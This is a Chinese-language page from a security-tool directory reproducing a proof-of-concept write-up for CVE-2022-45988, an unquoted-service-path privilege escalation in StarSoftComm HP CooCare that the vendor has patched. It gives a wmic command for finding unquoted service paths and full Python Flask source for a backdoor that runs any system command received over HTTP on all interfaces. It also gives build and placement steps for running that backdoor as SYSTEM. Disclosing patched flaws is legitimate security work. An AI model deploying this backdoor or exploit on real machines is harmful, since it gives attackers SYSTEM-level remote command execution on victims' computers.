Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/happy0717/cve-2022-45988
权限提升漏洞分析漏洞利用渗透测试二进制利用
GitHubhappy0717/cve-2022-45988

CVE-2022-45988

CVE-2022-45988 StarSoftComm HP CooCare 存在权限提升漏洞

查看仓库
33年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-45988 StarSoftComm HP CooCare 存在权限提升漏洞

####################################################

我已联系 hp-security-alert,他们已修复此漏洞。关于 StarSoftComm CooCare [HP-PSRT-IR #4106]
image
供应商回复了以下信息:

请按照以下步骤更新:

  1. 启动 eService
  2. 等待约 3 分钟
  3. 关闭并重新启动 eService
  4. 确认版本为 v5.364 或更高版本。

#####################################

StarSoftComm HP CooCare 存在一个权限提升漏洞,攻击者可利用该漏洞提升其权限级别。
e管家超级版是 HP 星 14 pro 自带的一款远程诊断软件,该软件为 StarSoftComm(软通科技)旗下产品。

测试环境:Windows 11 22621.819 HP LAPTOP HP Pavilion Plus 14 英寸笔记本电脑 14-eh0000 (56D77AV)

受影响版本:CooCare 低于 v5.364

#漏洞复现

#第一步:wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """
查找服务(使用上述 CMD 命令找到未引用的服务)

image

服务名称为 Windows Application Management Service,简称 WinAppMgmt。

image

该服务来自 StarSoftComm CooCare。

image

#第二步:准备恶意程序

image

root@kitploit:~
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/')
def hello_world():
    r = request.args.getlist('cmd')  # 接收 ?cmd= 参数
    a=os.popen(r[0])  # 执行系统命令
    l = a.read()
    return l  # 返回

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=14145, debug=True)  # 监听 HTTP 端口 14145

我使用 Python3 Flask 编写了一个恶意 exe,它可以监听 HTTP 端口 14145 并执行系统命令。

使用命令 pyinstaller.exe --onefile --windowed -F -w python_test.py 生成恶意 exe。

#第三步:将恶意软件放入路径 C:\ 并重命名为 Program.exe

image

#第四步:启动 Windows Application Management Service

如果 Windows Application Management Service 已启动,可以重启它。

image

#第五步:等待 Windows Application Management Service 启动并执行系统命令
C:\Program.exe 以系统权限运行

当我在任务管理器中看到 Windows Application Management Service 以 SYSTEM 身份启动时,打开浏览器输入 http://127.0.0.1:14145?cmd=whoami

等待......

......

它返回了。

NT SYSTEM

image

下载工具